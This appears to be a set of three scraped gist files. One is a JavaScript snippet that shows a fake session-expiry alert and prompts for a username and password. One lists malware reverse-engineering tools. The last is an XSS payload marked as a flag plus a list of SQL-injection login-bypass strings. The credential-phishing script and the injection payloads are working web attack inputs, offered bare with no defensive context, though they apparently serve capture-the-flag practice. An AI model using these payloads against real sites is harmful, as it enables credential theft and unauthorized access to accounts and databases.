This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert("<p>Your Session will expire soon Login to continue.</p>"); | |
| var usr= prompt("Please Enter Usename: "); | |
| var pass= prompt("Please Enter Password: "); | |
| document.write("Usename is: "+usr+"Password is: "+pass); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Tools that use For malware reverse engineering | |
| for help Reversing.kr ctf write ups | |
| Ollydbg | |
| IDA PRO | |
| PROCMON | |
| PROCEXP | |
| Hybrid-analysis.com | |
| drfu's malware | |
| malwr |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| flag XSS <img src onerror=alert("")> | |
| 'or''=' | |
| ' or 1=1 – | |
| 1'or'1'='1 | |
| admin'– | |
| " or 0=0 – | |
| or 0=0 – | |
| ' or 0=0 # | |
| " or 0=0 # |